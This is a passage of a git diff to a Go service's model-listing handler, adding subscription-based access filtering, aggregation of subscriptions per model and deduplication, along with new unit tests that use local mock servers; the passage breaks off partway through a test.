@@ -171,11 +262,98 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 				}})
 			return
 		}
-		h.logger.Debug("MaaSModelRef list succeeded, validating access by probing each model endpoint", "modelCount", len(list), "subscriptionHeaderProvided", selectedSubscription != "")
-		modelList = h.modelMgr.FilterModelsByAccess(c.Request.Context(), list, authHeader, selectedSubscription)
-		h.logger.Debug("Access validation complete", "listed", len(list), "accessible", len(modelList))
+
+		// Distinguish between "no subscription system" and "user has zero subscriptions"
+		if len(subscriptionsToUse) == 0 {
+			if h.subscriptionSelector == nil {
+				// Legacy case: no subscription system configured
+				h.logger.Debug("No subscription system configured, filtering models without subscription header")
+				modelList = h.modelMgr.FilterModelsByAccess(c.Request.Context(), list, authHeader, "")
+			} else {
+				// User has zero accessible subscriptions - return empty list
+				h.logger.Debug("User has zero accessible subscriptions, returning empty model list")
+				// modelList is already initialized to empty slice above
+			}
+		} else {
+			// Filter models by subscription(s) and aggregate subscriptions
+			// Deduplication key is (model ID, URL, OwnedBy) - models with the same ID, URL, and
+			// MaaSModelRef (namespace/name) are the same instance and should have their
+			// subscriptions aggregated into an array.
+			type modelKey struct {
+				id      string
+				url     string
+				ownedBy string
+			}
+			modelsByKey := make(map[modelKey]*models.Model)
+
+			for _, sub := range subscriptionsToUse {
+				// Pre-filter by modelRefs if available (optimization to reduce HTTP calls)
+				modelsToCheck := list
+				if len(sub.ModelRefs) > 0 {
+					h.logger.Debug("Pre-filtering models by subscription modelRefs",
+						"subscription", sub.Name,
+						"totalModels", len(list),
+						"modelRefsCount", len(sub.ModelRefs),
+					)
+					modelsToCheck = filterModelsBySubscription(list, sub.ModelRefs)
+					h.logger.Debug("After modelRef filtering", "modelsToCheck", len(modelsToCheck))
+				}
+
+				// Always probe with the subscription header for access validation
+				// For API keys: uses the subscription bound to the key (bare name format)
+				// For user tokens: uses each accessible subscription to check which models are available
+				// Using bare name format to match what's stored in API keys
+				probeSubscriptionHeader := sub.Name
+				h.logger.Debug("Filtering models by subscription", "subscription", sub.Name, "modelCount", len(modelsToCheck), "probeWithSubscriptionHeader", probeSubscriptionHeader != "")
+				filteredModels := h.modelMgr.FilterModelsByAccess(c.Request.Context(), modelsToCheck, authHeader, probeSubscriptionHeader)
+
+				for _, model := range filteredModels {
+					subInfo := models.SubscriptionInfo{
+						Name:        sub.Name,
+						DisplayName: sub.DisplayName,
+						Description: sub.Description,
+					}
+
+					// Create key from model ID, URL, and OwnedBy (namespace/name of MaaSModelRef)
+					urlStr := ""
+					if model.URL != nil {
+						urlStr = model.URL.String()
+					}
+					key := modelKey{id: model.ID, url: urlStr, ownedBy: model.OwnedBy}
+
+					if existingModel, exists := modelsByKey[key]; exists {
+						// Model already exists - append subscription if not already present
+						h.addSubscriptionIfNew(existingModel, subInfo)
+					} else {
+						// New model - create entry with subscriptions array
+						model.Subscriptions = []models.SubscriptionInfo{subInfo}
+						modelsByKey[key] = &model
+					}
+				}
+			}
+
+			// Convert map to slice with deterministic ordering
+			keys := make([]modelKey, 0, len(modelsByKey))
+			for k := range modelsByKey {
+				keys = append(keys, k)
+			}
+			sort.Slice(keys, func(i, j int) bool {
+				if keys[i].id != keys[j].id {
+					return keys[i].id < keys[j].id
+				}
+				if keys[i].url != keys[j].url {
+					return keys[i].url < keys[j].url
+				}
+				return keys[i].ownedBy < keys[j].ownedBy
+			})
+			for _, k := range keys {
+				modelList = append(modelList, *modelsByKey[k])
+			}
+		}
+
+		h.logger.Debug("Access validation complete", "listed", len(list), "accessible", len(modelList), "subscriptions", len(subscriptionsToUse))
 	} else {
-		h.logger.Debug("MaaSModelRef not configured (lister or namespace unset), returning empty model list")
+		h.logger.Debug("MaaSModelRef lister not configured, returning empty model list")
 	}
 
 	h.logger.Debug("GET /v1/models returning models", "count", len(modelList))
@@ -184,3 +362,29 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) {
 		Data:   modelList,
 	})
 }
+
+// filterModelsBySubscription filters models to only those matching the subscription's modelRefs.
+func filterModelsBySubscription(modelList []models.Model, modelRefs []subscription.ModelRefInfo) []models.Model {
+	if len(modelRefs) == 0 {
+		return modelList
+	}
+
+	// Build map of allowed models for fast lookup
+	allowed := make(map[string]bool)
+	for _, ref := range modelRefs {
+		key := ref.Namespace + "/" + ref.Name
+		allowed[key] = true
+	}
+
+	// Filter models
+	filtered := make([]models.Model, 0, len(modelList))
+	for _, model := range modelList {
+		// Models from MaaSModelRefLister have OwnedBy set to namespace/name
+		modelKey := model.OwnedBy
+		if allowed[modelKey] {
+			filtered = append(filtered, model)
+		}
+	}
+
+	return filtered
+}
diff --git a/maas-api/internal/handlers/models_test.go b/maas-api/internal/handlers/models_test.go
index 0707f762c..4f8c94908 100644
--- a/maas-api/internal/handlers/models_test.go
+++ b/maas-api/internal/handlers/models_test.go
@@ -33,8 +33,8 @@ const (
 	maasModelRefGVRResource = "maasmodelrefs"
 )
 
-// maasModelRefUnstructured returns an unstructured MaaSModelRef for testing (name, namespace, endpoint URL, ready).
-func maasModelRefUnstructured(name, namespace, endpoint string, ready bool) *unstructured.Unstructured {
+// maasModelRefUnstructured returns an unstructured MaaSModelRef for testing (name, namespace, endpoint URL, ready, annotations).
+func maasModelRefUnstructured(name, namespace, endpoint string, ready bool, annotations map[string]string) *unstructured.Unstructured {
 	u := &unstructured.Unstructured{}
 	u.SetGroupVersionKind(schema.GroupVersionKind{
 		Group:   maasModelRefGVRGroup,
@@ -49,20 +49,22 @@ func maasModelRefUnstructured(name, namespace, endpoint string, ready bool) *uns
 		_ = unstructured.SetNestedField(u.Object, "Ready", "status", "phase")
 	}
 	_ = unstructured.SetNestedField(u.Object, "llmisvc", "spec", "modelRef", "kind")
+	if len(annotations) > 0 {
+		u.SetAnnotations(annotations)
+	}
 	return u
 }
 
 // fakeMaaSModelRefLister implements models.MaaSModelRefLister for tests (namespace -> items).
 type fakeMaaSModelRefLister map[string][]*unstructured.Unstructured
 
-func (f fakeMaaSModelRefLister) List(namespace string) ([]*unstructured.Unstructured, error) {
-	items := f[namespace]
-	if items == nil {
-		return nil, nil
-	}
-	out := make([]*unstructured.Unstructured, len(items))
-	for i, u := range items {
-		out[i] = u.DeepCopy()
+func (f fakeMaaSModelRefLister) List() ([]*unstructured.Unstructured, error) {
+	// Return all items from all namespaces
+	var out []*unstructured.Unstructured
+	for _, items := range f {
+		for _, u := range items {
+			out = append(out, u.DeepCopy())
+		}
 	}
 	return out, nil
 }
@@ -263,10 +265,12 @@ func TestListingModels(t *testing.T) {
 				constant.AnnotationDescription:  "A large language model for general AI tasks",
 				constant.AnnotationDisplayName:  "Test Model Alpha",
 			},
-			// MaaSModelRef listing does not populate Details from annotations.
 			AssertDetails: func(t *testing.T, model models.Model) {
 				t.Helper()
-				_ = model
+				require.NotNil(t, model.Details, "Expected modelDetails to be populated from annotations")
+				assert.Equal(t, "Test Model Alpha", model.Details.DisplayName)
+				assert.Equal(t, "A large language model for general AI tasks", model.Details.Description)
+				assert.Equal(t, "General purpose LLM", model.Details.GenAIUseCase)
 			},
 		},
 		{
@@ -279,10 +283,12 @@ func TestListingModels(t *testing.T) {
 			Annotations: map[string]string{
 				constant.AnnotationDisplayName: "Test Model Beta",
 			},
-			// MaaSModelRef listing does not populate Details.
 			AssertDetails: func(t *testing.T, model models.Model) {
 				t.Helper()
-				_ = model
+				require.NotNil(t, model.Details, "Expected modelDetails to be populated from annotations")
+				assert.Equal(t, "Test Model Beta", model.Details.DisplayName)
+				assert.Empty(t, model.Details.Description)
+				assert.Empty(t, model.Details.GenAIUseCase)
 			},
 		},
 		{
@@ -305,7 +311,7 @@ func TestListingModels(t *testing.T) {
 	maasModelRefItems := make([]*unstructured.Unstructured, 0, len(llmTestScenarios))
 	for _, s := range llmTestScenarios {
 		endpoint := s.URL.String()
-		maasModelRefItems = append(maasModelRefItems, maasModelRefUnstructured(s.Name, fixtures.TestNamespace, endpoint, s.Ready))
+		maasModelRefItems = append(maasModelRefItems, maasModelRefUnstructured(s.Name, fixtures.TestNamespace, endpoint, s.Ready, s.Annotations))
 	}
 	maasModelRefLister := fakeMaaSModelRefLister{fixtures.TestNamespace: maasModelRefItems}
 
@@ -324,7 +330,7 @@ func TestListingModels(t *testing.T) {
 	// Create a mock subscription selector that auto-selects for single subscription users
 	subscriptionSelector := subscription.NewSelector(testLogger, &fakeSubscriptionLister{})
 
-	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister, fixtures.TestNamespace)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister)
 
 	// Create token handler to extract user info middleware
 	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
@@ -403,13 +409,14 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 	testLogger := logger.Development()
 
 	// Create mock servers that require specific subscription headers
+	// Use bare subscription names to match what Authorino injects from API key validation
 	premiumModelServer := createMockModelServerWithSubscriptionCheck(t, "premium-model", "premium")
 	freeModelServer := createMockModelServerWithSubscriptionCheck(t, "free-model", "free")
 
 	// Build MaaSModelRef unstructured list
 	maasModelRefItems := []*unstructured.Unstructured{
-		maasModelRefUnstructured("premium-model", fixtures.TestNamespace, premiumModelServer.URL, true),
-		maasModelRefUnstructured("free-model", fixtures.TestNamespace, freeModelServer.URL, true),
+		maasModelRefUnstructured("premium-model", fixtures.TestNamespace, premiumModelServer.URL, true, nil),
+		maasModelRefUnstructured("free-model", fixtures.TestNamespace, freeModelServer.URL, true, nil),
 	}
 	maasModelRefLister := fakeMaaSModelRefLister{fixtures.TestNamespace: maasModelRefItems}
 
@@ -431,13 +438,13 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 	}
 	subscriptionSelector := subscription.NewSelector(testLogger, multiSubLister)
 
-	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister, fixtures.TestNamespace)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, maasModelRefLister)
 	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
 
 	v1 := router.Group("/v1")
 	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
 
-	// Table-driven tests for subscription header variants
+	// Table-driven tests for API key auth (X-MaaS-Subscription header injected by Authorino)
 	subscriptionTests := []struct {
 		name               string
 		subscription       string
@@ -446,14 +453,14 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 		expectedModelCount int
 	}{
 		{
-			name:               "with premium subscription header",
+			name:               "API key - premium subscription",
 			subscription:       "premium",
 			userGroups:         `["premium-users"]`,
 			expectedModelID:    "premium-model",
 			expectedModelCount: 1,
 		},
 		{
-			name:               "with free subscription header",
+			name:               "API key - free subscription",
 			subscription:       "free",
 			userGroups:         `["free-users"]`,
 			expectedModelID:    "free-model",
@@ -468,6 +475,7 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 			require.NoError(t, err, "Failed to create request")
 
 			req.Header.Set("Authorization", "Bearer valid-token")
+			// Simulate Authorino injecting X-MaaS-Subscription from API key validation
 			req.Header.Set("X-Maas-Subscription", tt.subscription)
 			req.Header.Set(constant.HeaderUsername, "test-user@example.com")
 			req.Header.Set(constant.HeaderGroup, tt.userGroups)
@@ -484,7 +492,7 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 		})
 	}
 
-	t.Run("without subscription header - single subscription auto-selects", func(t *testing.T) {
+	t.Run("user token - single subscription returns all models", func(t *testing.T) {
 		w := httptest.NewRecorder()
 		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
 		require.NoError(t, err, "Failed to create request")
@@ -500,12 +508,13 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 		err = json.Unmarshal(w.Body.Bytes(), &response)
 		require.NoError(t, err, "Failed to unmarshal response body")
 
-		// User only has access to "free" subscription, so it auto-selects and returns free model
-		require.Len(t, response.Data, 1, "Expected one model with auto-selected free subscription")
+		// User token (no X-MaaS-Subscription header) returns all accessible models
+		// User only has access to "free" subscription, so returns that one model
+		require.Len(t, response.Data, 1, "Expected one model from accessible subscription")
 		assert.Equal(t, "free-model", response.Data[0].ID)
 	})
 
-	t.Run("without subscription header - multiple subscriptions requires header", func(t *testing.T) {
+	t.Run("without subscription header - user token returns all models", func(t *testing.T) {
 		w := httptest.NewRecorder()
 		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
 		require.NoError(t, err, "Failed to create request")
@@ -515,32 +524,37 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 		req.Header.Set(constant.HeaderGroup, `["free-users", "premium-users"]`)
 		router.ServeHTTP(w, req)
 
-		// User has access to both subscriptions, must specify which one
-		// Returns 403 for consistency with inferencing (Authorino limitation)
-		require.Equal(t, http.StatusForbidden, w.Code, "Expected 403 Forbidden")
+		// User token (no X-MaaS-Subscription header) returns all accessible models
+		require.Equal(t, http.StatusOK, w.Code, "Expected status OK")
 
-		var errorResponse map[string]any
-		err = json.Unmarshal(w.Body.Bytes(), &errorResponse)
-		require.NoError(t, err, "Failed to unmarshal error response")
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err, "Failed to unmarshal response body")
+
+		// User has access to both subscriptions, should return both models
+		require.Len(t, response.Data, 2, "Expected both models from both subscriptions")
 
-		errorObj, ok := errorResponse["error"].(map[string]any)
-		require.True(t, ok, "Expected error object")
-		assert.Equal(t, "permission_error", errorObj["type"])
+		modelIDs := make(map[string]bool)
+		for _, model := range response.Data {
+			modelIDs[model.ID] = true
+		}
+		assert.True(t, modelIDs["premium-model"], "Should include premium model")
+		assert.True(t, modelIDs["free-model"], "Should include free model")
 	})
 
-	// Table-driven tests for subscription error scenarios
+	// Table-driven tests for API key subscription error scenarios
 	subscriptionErrorTests := []struct {
 		name         string
 		subscription string
 		userGroups   string
 	}{
 		{
-			name:         "unknown subscription header - returns 403",
+			name:         "API key - unknown subscription - returns 403",
 			subscription: "nonexistent-subscription",
 			userGroups:   `["free-users"]`,
 		},
 		{
-			name:         "subscription user lacks access to - returns 403",
+			name:         "API key - no access to subscription - returns 403",
 			subscription: "premium",
 			userGroups:   `["free-users"]`,
 		},
@@ -570,3 +584,614 @@ func TestListingModelsWithSubscriptionHeader(t *testing.T) {
 		})
 	}
 }
+func TestListModels_ReturnAllModels(t *testing.T) {
+	testLogger := logger.Development()
+
+	// Create mock servers for models
+	// Use bare subscription names to match what Authorino injects from API key validation
+	model1Server := createMockModelServerWithSubscriptionCheck(t, "model-1", "sub-a")
+	model2Server := createMockModelServerWithSubscriptionCheck(t, "model-2", "sub-b")
+	model3Server := createMockModelServerWithSubscriptionCheck(t, "model-3", "sub-a")
+
+	// Setup MaaSModelRef lister with three models
+	lister := fakeMaaSModelRefLister{
+		"test-ns": []*unstructured.Unstructured{
+			maasModelRefUnstructured("model-1", "test-ns", model1Server.URL, true, nil),
+			maasModelRefUnstructured("model-2", "test-ns", model2Server.URL, true, nil),
+			maasModelRefUnstructured("model-3", "test-ns", model3Server.URL, true, nil),
+		},
+	}
+
+	// Setup subscription lister with display metadata
+	createSubscriptionWithMeta := func(name string, groups []string, displayName, description string) *unstructured.Unstructured {
+		sub := &unstructured.Unstructured{}
+		sub.SetGroupVersionKind(schema.GroupVersionKind{
+			Group:   "maas.opendatahub.io",
+			Version: "v1alpha1",
+			Kind:    "MaaSSubscription",
+		})
+		sub.SetName(name)
+		sub.SetNamespace(fixtures.TestNamespace)
+
+		groupSlice := make([]any, len(groups))
+		for i, g := range groups {
+			groupSlice[i] = map[string]any{"name": g}
+		}
+
+		spec := map[string]any{
+			"owner": map[string]any{
+				"groups": groupSlice,
+			},
+		}
+
+		_ = unstructured.SetNestedMap(sub.Object, spec, "spec")
+
+		if displayName != "" || description != "" {
+			annotations := map[string]string{}
+			if displayName != "" {
+				annotations[constant.AnnotationDisplayName] = displayName
+			}
+			if description != "" {
+				annotations[constant.AnnotationDescription] = description
+			}
+			sub.SetAnnotations(annotations)
+		}
+
+		return sub
+	}
+
+	subscriptionLister := &fakeSubscriptionListerWithMeta{
+		subscriptions: []*unstructured.Unstructured{
+			createSubscriptionWithMeta("sub-a", []string{"group-a"}, "Subscription A", "Description for A"),
+			createSubscriptionWithMeta("sub-b", []string{"group-b"}, "Subscription B", "Description for B"),
+		},
+	}
+
+	modelMgr, err := models.NewManager(testLogger)
+	require.NoError(t, err)
+
+	subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+	config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+	router, _ := fixtures.SetupTestServer(t, config)
+
+	_, cleanup := fixtures.StubTokenProviderAPIs(t, true)
+	defer cleanup()
+
+	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
+	v1 := router.Group("/v1")
+	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
+
+	t.Run("user token - returns all models from all subscriptions", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		// No X-MaaS-Subscription header = user token authentication
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["group-a", "group-b"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		assert.Equal(t, "list", response.Object)
+		assert.Len(t, response.Data, 3, "Should return all 3 models from both subscriptions")
+
+		// Verify subscription info is attached
+		subscriptionNames := make(map[string]bool)
+		for _, model := range response.Data {
+			require.NotEmpty(t, model.Subscriptions, "Subscriptions array should not be empty")
+			for _, sub := range model.Subscriptions {
+				subscriptionNames[sub.Name] = true
+			}
+		}
+
+		assert.True(t, subscriptionNames["sub-a"], "Should have models from sub-a")
+		assert.True(t, subscriptionNames["sub-b"], "Should have models from sub-b")
+	})
+
+	t.Run("user token - returns empty list when user has no subscriptions", func(t *testing.T) {
+		emptySubscriptionLister := &fakeSubscriptionListerWithMeta{
+			subscriptions: []*unstructured.Unstructured{
+				createSubscriptionWithMeta("sub-a", []string{"other-group"}, "", ""),
+			},
+		}
+
+		subscriptionSelector := subscription.NewSelector(testLogger, emptySubscriptionLister)
+		emptyHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+		config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+		router2, _ := fixtures.SetupTestServer(t, config)
+
+		_, cleanup2 := fixtures.StubTokenProviderAPIs(t, true)
+		defer cleanup2()
+
+		tokenHandler2 := token.NewHandler(testLogger, fixtures.TestTenant)
+		v1_2 := router2.Group("/v1")
+		v1_2.GET("/models", tokenHandler2.ExtractUserInfo(), emptyHandler.ListLLMs)
+
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		// No X-MaaS-Subscription header = user token authentication
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["user-group"]`)
+		router2.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		assert.Equal(t, "list", response.Object)
+		assert.Empty(t, response.Data, "Should return empty list when user has no subscriptions")
+	})
+
+	t.Run("user token - attaches subscription metadata to models", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		// No X-MaaS-Subscription header = user token authentication
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["group-a"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Find model-1 which should have sub-a metadata
+		var model1 *models.Model
+		for i := range response.Data {
+			if response.Data[i].ID == "model-1" {
+				model1 = &response.Data[i]
+				break
+			}
+		}
+
+		require.NotNil(t, model1, "model-1 should be in response")
+		require.NotEmpty(t, model1.Subscriptions, "Subscriptions array should not be empty")
+		require.Len(t, model1.Subscriptions, 1, "model-1 should have exactly 1 subscription")
+		assert.Equal(t, "sub-a", model1.Subscriptions[0].Name)
+		assert.Equal(t, "Subscription A", model1.Subscriptions[0].DisplayName)
+		assert.Equal(t, "Description for A", model1.Subscriptions[0].Description)
+	})
+}
+
+// fakeSubscriptionListerWithMeta implements subscription.Lister with custom subscriptions.
+type fakeSubscriptionListerWithMeta struct {
+	subscriptions []*unstructured.Unstructured
+}
+
+func (f *fakeSubscriptionListerWithMeta) List() ([]*unstructured.Unstructured, error) {
+	return f.subscriptions, nil
+}
+
+func TestListModels_DeduplicationBySubscription(t *testing.T) {
+	testLogger := logger.Development()
+
+	// Create a mock server that responds to both subscriptions
+	modelServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write(makeModelsResponse("shared-model"))
+	}))
+	t.Cleanup(modelServer.Close)
+
+	// Setup MaaSModelRef lister with one model
+	lister := fakeMaaSModelRefLister{
+		"test-ns": []*unstructured.Unstructured{
+			maasModelRefUnstructured("shared-model", "test-ns", modelServer.URL, true, nil),
+		},
+	}
+
+	// Setup two subscriptions that both have access to the same model
+	createSubscription := func(name string, groups []string) *unstructured.Unstructured {
+		sub := &unstructured.Unstructured{}
+		sub.SetGroupVersionKind(schema.GroupVersionKind{
+			Group:   "maas.opendatahub.io",
+			Version: "v1alpha1",
+			Kind:    "MaaSSubscription",
+		})
+		sub.SetName(name)
+		sub.SetNamespace(fixtures.TestNamespace)
+
+		groupSlice := make([]any, len(groups))
+		for i, g := range groups {
+			groupSlice[i] = map[string]any{"name": g}
+		}
+
+		_ = unstructured.SetNestedMap(sub.Object, map[string]any{
+			"owner": map[string]any{
+				"groups": groupSlice,
+			},
+		}, "spec")
+		return sub
+	}
+
+	subscriptionLister := &fakeSubscriptionListerWithMeta{
+		subscriptions: []*unstructured.Unstructured{
+			createSubscription("sub-a", []string{"user-group"}),
+			createSubscription("sub-b", []string{"user-group"}),
+		},
+	}
+
+	modelMgr, err := models.NewManager(testLogger)
+	require.NoError(t, err)
+
+	subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+	config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+	router, _ := fixtures.SetupTestServer(t, config)
+
+	_, cleanup := fixtures.StubTokenProviderAPIs(t, true)
+	defer cleanup()
+
+	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
+	v1 := router.Group("/v1")
+	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
+
+	t.Run("same model in different subscriptions aggregates into subscriptions array", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		req.Header.Set("X-Maas-Return-All-Models", "true")
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["user-group"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Should have 1 entry with 2 subscriptions aggregated
+		assert.Len(t, response.Data, 1, "Same model instance should aggregate subscriptions into one entry")
+
+		model := response.Data[0]
+		assert.Equal(t, "shared-model", model.ID)
+
+		// Should have 2 subscriptions in the array
+		require.Len(t, model.Subscriptions, 2, "Model should have 2 subscriptions")
+
+		subscriptionNames := []string{
+			model.Subscriptions[0].Name,
+			model.Subscriptions[1].Name,
+		}
+
+		assert.Contains(t, subscriptionNames, "sub-a")
+		assert.Contains(t, subscriptionNames, "sub-b")
+	})
+}
+
+func TestListModels_DifferentModelRefsWithSameModelID(t *testing.T) {
+	testLogger := logger.Development()
+
+	// Create two mock servers that both return the same model ID "gpt-4"
+	// but represent different MaaSModelRef instances
+	modelServerA := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write(makeModelsResponse("gpt-4"))
+	}))
+	t.Cleanup(modelServerA.Close)
+
+	modelServerB := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write(makeModelsResponse("gpt-4"))
+	}))
+	t.Cleanup(modelServerB.Close)
+
+	// Setup MaaSModelRef lister with two different MaaSModelRefs that return same model ID
+	lister := fakeMaaSModelRefLister{
+		"namespace-a": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-ref", "namespace-a", modelServerA.URL, true, nil),
+		},
+		"namespace-b": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-ref", "namespace-b", modelServerB.URL, true, nil),
+		},
+	}
+
+	// Setup single subscription
+	createSubscription := func(name string, groups []string) *unstructured.Unstructured {
+		sub := &unstructured.Unstructured{}
+		sub.SetGroupVersionKind(schema.GroupVersionKind{
+			Group:   "maas.opendatahub.io",
+			Version: "v1alpha1",
+			Kind:    "MaaSSubscription",
+		})
+		sub.SetName(name)
+		sub.SetNamespace(fixtures.TestNamespace)
+
+		groupSlice := make([]any, len(groups))
+		for i, g := range groups {
+			groupSlice[i] = map[string]any{"name": g}
+		}
+
+		_ = unstructured.SetNestedMap(sub.Object, map[string]any{
+			"owner": map[string]any{
+				"groups": groupSlice,
+			},
+		}, "spec")
+		return sub
+	}
+
+	subscriptionLister := &fakeSubscriptionListerWithMeta{
+		subscriptions: []*unstructured.Unstructured{
+			createSubscription("sub-a", []string{"user-group"}),
+		},
+	}
+
+	modelMgr, err := models.NewManager(testLogger)
+	require.NoError(t, err)
+
+	subscriptionSelector := subscription.NewSelector(testLogger, subscriptionLister)
+	modelsHandler := handlers.NewModelsHandler(testLogger, modelMgr, subscriptionSelector, lister)
+
+	config := fixtures.TestServerConfig{Objects: []runtime.Object{}}
+	router, _ := fixtures.SetupTestServer(t, config)
+
+	_, cleanup := fixtures.StubTokenProviderAPIs(t, true)
+	defer cleanup()
+
+	tokenHandler := token.NewHandler(testLogger, fixtures.TestTenant)
+	v1 := router.Group("/v1")
+	v1.GET("/models", tokenHandler.ExtractUserInfo(), modelsHandler.ListLLMs)
+
+	t.Run("different MaaSModelRefs with same model ID but different URLs return separate entries", func(t *testing.T) {
+		w := httptest.NewRecorder()
+		req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, "/v1/models", nil)
+		require.NoError(t, err)
+
+		req.Header.Set("Authorization", "Bearer valid-token")
+		req.Header.Set("X-Maas-Return-All-Models", "true")
+		req.Header.Set(constant.HeaderUsername, "test-user@example.com")
+		req.Header.Set(constant.HeaderGroup, `["user-group"]`)
+		router.ServeHTTP(w, req)
+
+		require.Equal(t, http.StatusOK, w.Code)
+
+		var response pagination.Page[models.Model]
+		err = json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Should have 2 entries because URLs are different (deduplication by model ID + URL)
+		assert.Len(t, response.Data, 2, "Different URLs should create separate entries even with same model ID")
+
+		// Both should have model ID "gpt-4" and subscription "sub-a"
+		for _, model := range response.Data {
+			assert.Equal(t, "gpt-4", model.ID)
+			require.Len(t, model.Subscriptions, 1, "Each model should have 1 subscription")
+			assert.Equal(t, "sub-a", model.Subscriptions[0].Name)
+		}
+
+		// Verify we have 2 different URLs
+		urls := []string{response.Data[0].URL.String(), response.Data[1].URL.String()}
+		assert.NotEqual(t, urls[0], urls[1], "Should have different URLs")
+	})
+}
+
+func TestListModels_DifferentModelRefsWithSameURLAndModelID(t *testing.T) {
+	testLogger := logger.Development()
+
+	// Create ONE mock server that both MaaSModelRefs will point to
+	sharedModelServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/json")
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write(makeModelsResponse("gpt-4"))
+	}))
+	t.Cleanup(sharedModelServer.Close)
+
+	// Setup MaaSModelRef lister with two different MaaSModelRefs pointing to the SAME URL
+	lister := fakeMaaSModelRefLister{
+		"namespace-a": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-ref", "namespace-a", sharedModelServer.URL, true, nil),
+		},
+		"namespace-b": []*unstructured.Unstructured{
+			maasModelRefUnstructured("gpt-4-another-ref", "namespace-b", sharedModelServer.URL, true, nil),
+		},
+	}
+
+	// Setup single subscription
+	createSubscription := func(name string, groups []string) *unstructured.Unstructured {
+		sub := &unstructured.Unstructured{}
+		sub.SetGroupVersionKind(schema.GroupVersionKind{
+			Group:   "maas.opendatahub.io",
